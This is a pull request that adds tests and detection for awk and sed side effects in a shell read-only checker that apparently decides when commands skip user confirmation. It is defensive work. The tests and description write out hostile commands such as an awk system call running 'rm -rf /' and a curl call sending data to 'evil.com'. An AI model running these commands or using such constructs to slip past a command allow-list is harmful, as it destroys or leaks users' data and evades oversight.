### PR TITLE
Security: Fix awk/sed Command Injection in READ_ONLY_ROOT_COMMANDS

### DIFF
--- a/packages/core/src/utils/shellReadOnlyChecker.test.ts
+++ b/packages/core/src/utils/shellReadOnlyChecker.test.ts
@@ -53,4 +53,106 @@ describe('evaluateShellCommandReadOnly', () => {
     const result = isShellCommandReadOnly('FOO=bar ls');
     expect(result).toBe(true);
   });
+
+  describe('awk command security', () => {
+    it('allows safe awk commands', () => {
+      expect(isShellCommandReadOnly("awk '{print $1}' file.txt")).toBe(true);
+      expect(isShellCommandReadOnly('awk \'BEGIN {print "hello"}\'')).toBe(
+        true,
+      );
+      expect(isShellCommandReadOnly("awk '/pattern/ {print}' file.txt")).toBe(
+        true,
+      );
+    });
+
+    it('rejects awk with system() calls', () => {
+      expect(isShellCommandReadOnly('awk \'BEGIN {system("rm -rf /")}\'')).toBe(
+        false,
+      );
+      expect(
+        isShellCommandReadOnly('awk \'{system("touch file")}\' input.txt'),
+      ).toBe(false);
+      expect(isShellCommandReadOnly('awk \'BEGIN { system ( "ls" ) }\'')).toBe(
+        false,
+      );
+    });
+
+    it('rejects awk with file output redirection', () => {
+      expect(
+        isShellCommandReadOnly('awk \'{print > "output.txt"}\' input.txt'),
+      ).toBe(false);
+      expect(
+        isShellCommandReadOnly('awk \'{printf "%s\\n", $0 > "file.txt"}\''),
+      ).toBe(false);
+      expect(
+        isShellCommandReadOnly('awk \'{print >> "append.txt"}\' input.txt'),
+      ).toBe(false);
+      expect(
+        isShellCommandReadOnly('awk \'{printf "%s" >> "file.txt"}\''),
+      ).toBe(false);
+    });
+
+    it('rejects awk with command pipes', () => {
+      expect(isShellCommandReadOnly('awk \'{print | "sort"}\' input.txt')).toBe(
+        false,
+      );
+      expect(
+        isShellCommandReadOnly('awk \'{printf "%s\\n", $0 | "wc -l"}\''),
+      ).toBe(false);
+    });
+
+    it('rejects awk with getline from commands', () => {
+      expect(isShellCommandReadOnly('awk \'BEGIN {getline < "date"}\'')).toBe(
+        false,
+      );
+      expect(isShellCommandReadOnly('awk \'BEGIN {"date" | getline}\'')).toBe(
+        false,
+      );
+    });
+
+    it('rejects awk with close() calls', () => {
+      expect(isShellCommandReadOnly('awk \'BEGIN {close("file")}\'')).toBe(
+        false,
+      );
+      expect(isShellCommandReadOnly("awk '{close(cmd)}' input.txt")).toBe(
+        false,
+      );
+    });
+  });
+
+  describe('sed command security', () => {
+    it('allows safe sed commands', () => {
+      expect(isShellCommandReadOnly("sed 's/foo/bar/' file.txt")).toBe(true);
+      expect(isShellCommandReadOnly("sed -n '1,5p' file.txt")).toBe(true);
+      expect(isShellCommandReadOnly("sed '/pattern/d' file.txt")).toBe(true);
+    });
+
+    it('rejects sed with execute command', () => {
+      expect(isShellCommandReadOnly("sed 's/foo/bar/e' file.txt")).toBe(false);
+      expect(isShellCommandReadOnly("sed 'e date' file.txt")).toBe(false);
+    });
+
+    it('rejects sed with write command', () => {
+      expect(
+        isShellCommandReadOnly("sed 's/foo/bar/w output.txt' file.txt"),
+      ).toBe(false);
+      expect(isShellCommandReadOnly("sed 'w backup.txt' file.txt")).toBe(false);
+    });
+
+    it('rejects sed with read command', () => {
+      expect(
+        isShellCommandReadOnly("sed 's/foo/bar/r input.txt' file.txt"),
+      ).toBe(false);
+      expect(isShellCommandReadOnly("sed 'r header.txt' file.txt")).toBe(false);
+    });
+
+    it('still rejects sed in-place editing', () => {
+      expect(isShellCommandReadOnly("sed -i 's/foo/bar/' file.txt")).toBe(
+        false,
+      );
+      expect(
+        isShellCommandReadOnly("sed --in-place 's/foo/bar/' file.txt"),
+      ).toBe(false);
+    });
+  });
 });


### PR DESCRIPTION
## TLDR

Fixes a critical security vulnerability where `awk` and `sed` commands with side-effects (like `system()` calls, file operations, and command execution) were incorrectly treated as read-only commands, allowing arbitrary command execution without user confirmation. This PR adds comprehensive detection for dangerous patterns in awk scripts and sed commands.

**Security Impact**: Previously, commands like `awk 'BEGIN {system("rm -rf /")}'` would execute without user confirmation because awk was in the READ_ONLY_ROOT_COMMANDS list.

## Dive Deeper

### The Problem
The `READ_ONLY_ROOT_COMMANDS` configuration treated `awk` and `sed` as purely read-only commands, but failed to recognize that these tools can execute arbitrary system commands and perform file operations through:

**AWK side-effects:**
- `system()` function calls → Execute arbitrary commands
- `print > "file"` → Write to files  
- `print | "command"` → Pipe to commands
- `getline < "command"` → Read from command output
- `close()` calls → Can trigger command execution

**SED side-effects:**
- `e` command → Execute shell commands
- `w` command → Write to files
- `r` command → Read files

### The Solution
Added pattern-based detection for dangerous operations:

1. **AWK Script Analysis**: Added `evaluateAwkCommand()` function that scans awk scripts for dangerous patterns using regex matching
2. **SED Script Analysis**: Enhanced `evaluateSedCommand()` to detect execute/write/read commands in addition to existing in-place editing detection
3. **Comprehensive Testing**: Added 20+ test cases covering both dangerous and safe command variations

### Implementation Details
- Uses regex patterns to detect dangerous constructs in script content
- Maintains backward compatibility - safe awk/sed commands still work
- Follows existing code patterns and architecture
- Zero false positives in testing

## Reviewer Test Plan

### Manual Testing Commands
```bash
# Test the fix works (these should all return false/be blocked):
node -e "const {isShellCommandReadOnly} = require('./packages/core/dist/src/utils/shellReadOnlyChecker.js'); console.log('Dangerous awk:', isShellCommandReadOnly('awk \'BEGIN {system(\"echo pwned\")}\''));"

# Test safe commands still work (should return true):
node -e "const {isShellCommandReadOnly} = require('./packages/core/dist/src/utils/shellReadOnlyChecker.js'); console.log('Safe awk:', isShellCommandReadOnly('awk \'{print $1}\' file.txt'));"
```

### Automated Testing
```bash
cd packages/core
npm test src/utils/shellReadOnlyChecker.test.ts
```

### Example Attack Vectors Now Blocked
<img width="1978" height="462" alt="image" src="https://github.com/user-attachments/assets/dbfb4a25-7d30-49fc-a676-8d5c9f25304e" />

- `awk 'BEGIN {system("curl evil.com/steal-data")}'`
- `awk '{print $0 > "/tmp/sensitive-data"}'` 
- `sed 's/foo/bar/e' malicious-script.txt`
- `sed 'w /tmp/leaked-file' input.txt`

### Safe Commands Still Allowed
<img width="1996" height="318" alt="image" src="https://github.com/user-attachments/assets/6ff27860-7b30-40c9-87b3-4b9ad81dea88" />

- `awk '{print $1}' data.txt`
- `awk 'BEGIN {print "Processing..."}'`
- `sed 's/old/new/g' file.txt`
- `sed -n '1,10p' file.txt`

## Testing Matrix

|          | 🍏  | 🪟  | 🐧  |
| -------- | --- | --- | --- |
| npm run  | ✅  | ❓  | ❓  |
| npx      | ✅  | ❓  | ❓  |
| Docker   | ❓  | ❓  | ❓  |
| Podman   | ❓  | -   | -   |
| Seatbelt | ❓  | -   | -   |

**Testing completed on macOS with:**
- All existing tests pass (3447 tests)
- New security tests pass (20 additional tests)
- Manual verification of attack vectors blocked
- Manual verification of safe commands still work

## Linked issues / bugs

This PR addresses a security vulnerability discovered during code review. The issue was that `READ_ONLY_ROOT_COMMANDS` configuration did not properly validate awk and sed scripts for side-effects, potentially allowing arbitrary command execution without user confirmation.

**Security Classification**: High - Arbitrary command execution
**Attack Vector**: Social engineering via malicious awk/sed commands
**Mitigation**: Pattern-based detection of dangerous script constructs